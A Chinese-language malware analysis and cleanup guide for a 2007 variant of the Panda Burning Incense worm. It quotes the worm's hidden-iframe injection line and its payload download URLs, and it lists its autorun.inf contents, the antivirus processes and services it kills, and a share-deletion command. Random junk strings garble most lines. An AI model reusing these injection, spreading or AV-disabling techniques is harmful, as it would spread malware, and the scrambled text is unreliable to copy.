熊猫烧香最新变种分析及查杀方法

文件名称：nvscv32.exe T.?k>Ak  
ddpl Pzm#  
病毒名称：目前各杀毒软件无法查杀（已经将病毒样本上报各杀毒厂商） m24v@?*  
+/'<z  
中文名称：（尼姆亚，熊猫烧香） DR+,Y2!_GT  
,=w!vO5s  
病毒大小：68,570 字节 M StX*Zw  
}#N]0I)JI  
编写语言：Borland Delphi 6.0 - 7.0 s^|\9%WD  
=q CF%~  
加壳方式：FSG 2.0 -> bart/xt Q^h5">P  
#+sF`qR,  
发现时间：2007.1.16 jqoPLbxT
 
>2-F2E,  
危害等级：高 A]y*so!)>  
/#q")4Mf  
一、病毒描述： bejGfc  
$Lq:=7&LRn  
含有病毒体的文件被运行后，病毒将自身拷贝至系统目录，同时修改注册表将自身设置为开机启动项，并遍历各个驱动器，将自身写入磁盘根目录下，增加一个 Autorun.inf文件，使得用户打开该盘时激活病毒体。随后病毒体开一个线程进行本地文件感染，并对局域网其他电脑进行扫描，同时开另外一个线程连接某网站下载木马程序进行发动恶意攻击。 =Lw3 \5l  
$iJnxqn  
二：中毒现象： $AwZ2HY  
z%2w(&1  
1：在系统每个分区根目录下存在setup.exe和autorun.inf文件（A和B盘不感染）。 {OxWcK\2@h  
_`aR_%Gx  
2：无法手工修改“文件夹选项”将隐藏文件显示出来。 X5E '*W  
lCFU1 GHH  
3：在每个感染后的文件夹中可见Desktop_ini的隐藏文件，内容为感染日期 如：2007-1-16 APHPN:v  
?V+wjw  
4：电脑上的所有脚本文件中加入以下代码：<iframe src=http://www.krvkr.com/worm.htm width=”0” height=”0”></iframe> 1mUTtYU  
qC j*>D  
5:中毒后的机器上常见的反病毒软件及防火墙无法正常开启及运行。 I6w/0,azC  
zA{8C];~  
6：不能正常使用任务管理器，SREng.exe等工具。 |zMqJ.qu  
[@.B4p  
7：无故的向外发包，连接局域网中其他机器。 ^CQ1I0  
NWISS  
三：技术分析 i:k-"  
|3@=CE7G  
1：病毒文件运行后,将自身复制到%SystemRoot%\system32\drivers\nvscv32.exe
&:8T$UV  
m3?e]nL4W  
建立注册表自启动项: F$ {4X /9n  
FE6C6dW{  
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\] R~c1)[[E  
TzY!D*%z  
nvscv32: "C:\WINDOWS\system32\drivers\nvscv32.exe" u9}!Gq  
+ U5U.f%  
2：查找反病毒窗体病毒结束相关进程: QN #)F  
cdp{W  
天网防火墙 SQIdJG^:  
E4m:1=Nd~]  
virusscan %gTVW!q  
"yri[X  
symantec antivirus PN9^[X  
QZ0R:TY  
system safety monitor yM17H\=  
i@{*O@m  
system repair engineer 8_awMVAy  
YAMfP8S  
wrapped gift killer l'2H4W_+  
x~(y "^ph  
游戏木马检测大师 0%;MVMH  
[iXi\Ex  
超级巡警 MBv/  
TPqvp|~2  
3：结束以下进程: s?+fPOF  
'{W3j^m7  
mcshield.exe uf?b%:A  
NCxn^$/+>9  
vstskmgr.exe S]b xQa+  
VK$zq5D  
naprdmgr.exe kpWzMd &RK  
+yIL[D  
updaterui.exe L,%Z9  
2moIgJ   
tbmon.exe $%;jk  
mQnL<0_
<f  
scan32.exe t}c v2S  
fT x4vlI4  
ravmond.exe \
@:j  
i)8gCDc  
ccenter.exe 0ZT 0
 
+|M{I= 8  
ravtask.exe k)Zn>  
ktWZBQY  
rav.exe p*!q}%U  
,=x RoXYB}  
ravmon.exe e %&  
z2ds8-z  
ravmond.exe ifd}]UMQ  
h\2}875  
ravstub.exe oM2|]ew)  
k|l5"&K~.  
kvxp.kxp -@#Pc#  
oN4G1U Kc  
kvmonxp.kxp ^}tLnF  
6g8M7<og9R  
kvcenter.kxp +{'lZa  
3 ^pYCK%  
kvsrvxp.exe (A2U~j?Ry}  
6G$/NW=L  
kregex.exe vD_u[j]  
M;V&KGZ  
uihost.exe QW,cn7  
_J` |<}?t;  
trojdie.kxp [:Xn6)qz  
qih6me8C  
frogagent.exe \A ;^ UxG  
x{~_/;\p3  
kvxp.kxp j_(?=7Y3g  
BU'Ki \  
kvmonxp.kxp $m{{,&}k  
oO8]lHS?@  
kvcenter.kxp xP
42xv9U  
x Ridc^  
kvsrvxp.exe }Z^FEd"y  
l'W3=,G[?  
kregex.exe :l4^iSf  
F{kG  
uihost.exe Vn@A]Jx^  
^NY+wR5Sn  
trojdie.kxp /j$$0F>s7  
H&w(]PDh  
frogagent.exe LH bZjZ2  
l.sm~/  
logo1_.exe t;
h+Cf4  
}R4(B2vup  
logo_1.exe ZDW,7b%U  
D`1I;Tb#  
rundl132.exe )J{.Cx<E  
=;kRk.qzy  
taskmgr.exe $_ST:h&C  
=7*oC  
msconfig.exe "tqS|ok.  
t)YFT
O"Jj  
regedit.exe 22l|!B%o  
>+zAWK9  
sreng.exe J11dqj  
4：禁用下列服务: 8''9@xz  
YhEiN. ~  
schedule 1!K!oY  
FEge
+`{,  
sharedaccess wa9'2a1?  
]|H]9mys98  
rsccenter mvUVy1-c  
}w;Q^EU  
rsravmon U/}AiCdj@  
r0rJ.}!  
rsccenter I|Vk.,  
qpluk!  
kvwsc Tb>IHoil  
oVKsic?  
kvsrvxp ~nLkn#Z  
|6\FI?  
kvwsc }dV9%0s!  
AJJ%gxqGq  
kvsrvxp 'XC&BW
J  
6)tB{:h&~0  
kavsvc UXcH";*9b  
FCS5@l,'<  
avp ymzPJ??
!  
A>rWGo.{E  
avp NgDZ4&L  
Oc^6u  
kavsvc %fexuy4  
-f-O2G=  
mcafeeframework ')Dp%"\?  
ogkz(wZ  
mcshield 6KBzlj0T+  
GN~[xXJU  
mctaskmanager x"zjN'|  


S'v V"  
mcafeeframework .=et{\  
WF3DGqs_]  
mcshield ,?7xb]h  
y~4SKv $  
mctaskmanager &deZ  
URmAI8fq*M  
navapsvc VR5e CJ:i  
!#_h2a  
wscsvc L*SSv wSL  
v"G%5pq*\  
kpfwsvc <IHFD^3|j  
Nv*E .|G  
sndsrvc 76u/WC>B  
1OfSq1G>v$  
ccproxy =0!\F~  
buxI-wv  
ccevtmgr <?=mLOo=  
^R8U-V8:  
ccsetmgr )$Dcrrj  
kL2Zr  
spbbcsvc q|Pt>4c5?  
$jUS[.S_|I  
symantec core lc @FnI?Rx  
67KRM(S  
npfmntor Gn2bZ%l  
a2klOX{  
mskservice +|}K5q\  
NP<F==,  
firesvc fEv<W  
Ql6ai  
5：删除下列注册表项: y}:)cA~o(y  
;
([t
f;  
software\microsoft\windows\currentversion\run\ravtask CL@h!h554_  
C^\*|=*\  
software\microsoft\windows\currentversion\run\kvmonxp 33,JUQ2u  
!7"K>m<  
software\microsoft\windows\currentversion\run\kav l_j<aCY?|  
*
3etxnQc  
software\microsoft\windows\currentversion\run\kavpersonal50 R6WgA@Z|r  
>kDdWgRQ  
software\microsoft\windows\currentversion\run\mcafeeupdaterui [
K4+G]6  
w;SH>Ax:  
software\microsoft\windows\currentversion\run\network associates error reporting service "<jEI /  
r~D~7MNl  
software\microsoft\windows\currentversion\run\shstatexe
,p/b$d1p  
l SV
W}t  
software\microsoft\windows\currentversion\run\ylive.exe ,b.4uJg'  
CAo )v,f  
software\microsoft\windows\currentversion\run\yassistse )T};Q:  
YaJ{"'}  
6：感染所有可执行文件，并将图标改成（这次不是熊猫烧香那个图标了） T m@1q!G  
c]>&6-;rf  
7：跳过下列目录: >2Qqa;nx|  
5q_OuZ/6  
windows z)Q^j>%  
M6hvi(!X2  
winnt ,M/#Q6P0}  
<%3SI.  
systemvolumeinformation l;Wy,?p  
6 XOu~+7  
recycled %d[xr h  
zyp"*0zUr  
windowsnt 548[!p4  
]20"la5  
windowsupdate =u3@ Dhw  
L5k>;|SA  
windowsmediaplayer "k1Tsd-  
yDkDtO`K  
outlookexpress F)5B[.ce  
&pY G  
netmeeting SX=0f^  
,nChwEn  
commonfiles 7" STS7_  
cJWfLD>2_!  
complusapplications v.2Vg  
LI|H
ET_  
commonfiles eeJt4DV8v  
}B '*8^S  
messenger ;7n*PBUJJ  
>'TD?@sr  
installshieldinstallationinformation @Rb1)$~#  
TX [%s@C  
msn .q9|XDqQc  
]vkHU6d  
microsoftfrontpage _t;VE06Xjs  
ryp$|?ckJ  
moviemaker P"_}F  
8!%"/*P$   
msngaminzone AW&s-b%P  
(`y|AOs  
8：删除*.gho备份文件. 4x{ti5Y0  
Nl<,rD+KSD  
9：在所有驱动器根目录建立自身文件副本setup.exe,建立autorun.inf文件使病毒自动运行,设置文件属性为隐藏、只读、系统. RGA*7  
-zLI!F 0  
autorun.inf内容： F4<2.V)#-  
wYMX1=  
程序代码 ?| LB:8  
@bCiaBdi  
[AutoRun] ZUJOBjb` K  
UG'U D"  
OPEN=setup.exe H'\EA(v+  
LP-Q'vb<=  
shellexecute=setup.exe HWfX>Vf>}k  
wBHDof xX  
shell\Auto\command=setup.exe Ahbu
>LPk  
qq_,"~  
10：删除共享：cmd.exe /c net share admin$ /del /y \Y[)bo6s  
w:zC/5x`  
11：在机器上所有脚本文件中加入<iframe src=http://www.krvkr.com/worm.htm width=”0” height=”0”></iframe>，此代码地址是一个利用MS-06014漏洞攻击的网页木马，一旦用户浏览中此病毒的服务器上的网页，如果系统没有打补丁，就会下载执行此病毒。 3 DHA^9<q  
Dj.+5f'  
12：扫描局域网机器，一旦发现漏洞，就迅速传播。 6:tr8 X_  
13：在后台访问http://www.whboy.net/update/wormcn.txt，根据下载列表下载其他病毒。 +*{5ORq=  
\` ^Tbn:  
目前下载列表如下： be%*0lr  
V"jnrNs3  
http://www.krvkr.com/down/cq.exe B]F7t4Y!  
k[)@I;m  
http://www.krvkr.com/down/mh.exe R./6Q1  
h:sG23@=  
http://www.krvkr.com/down/my.exe `80Hxp@  
iQ"F`C  
http://www.krvkr.com/down/wl.exe `#8R+c=$  
gK\7^95  
http://www.krvkr.com/down/rx.exe X )s7_  
V>92/w.fe  
http://www.krvkr.com/down/wow.exe u`@FA?+E1  
X hX'*{3k  
http://www.krvkr.com/down/zt.exe %<|KJb4?  
<uwCP4E  
http://www.krvkr.com/down/wm.exe !QS<;)N@  
" z'!il#  
http://www.krvkr.com/down/dj.exe wR$8drn]Rq  
/-4B)mL  
http://www.krvkr.com/cn/iechajian.exe J4#]8!A  
S5a<L_  
到此病毒行为分析完毕。 + qqN  
: X|7l?{xW  
四：Sec120.Com专家解决方案： g"?D>}@=  
d( g_y m*  
1：关闭网络共享，断开网络。 beZ| i 1:  
gSYX@'Q!  
2：使用IceSword结束掉nvscv32.exe进程（速度要快，抢在病毒感染IceSword前） +aq
o8'a  
T["(YFCByg  
3:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL CheckedValue的数值改为1 !r0P\  
Rj`Y X0?+  
4：删除注册表启动项 /
y|r iW  
pP
pnO  
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\] C~V$G}mM  
j!7Uj]  
nvscv32: "C:\WINDOWS\system32\drivers\nvscv32.exe" z1s"C[W2T  
ved Qwzh  
5：删除C:\WINDOWS\system32\drivers\nvscv32.exe {U-EBXV  
BmXGk  
6：删除每个盘根目录下的autorun.inf文件和setup.exe文件，利用搜索功能，将Desktop_.ini全部删除。 L(8dK  
F &}V65  
7：如果电脑上有脚本文件，将病毒代码全部删除。 Z"+!ayA7D  
cSk}53  
8：关闭系统的自动播放功能。 MV\zwH  
<5~>.DuE  
这样就基本上将病毒清除了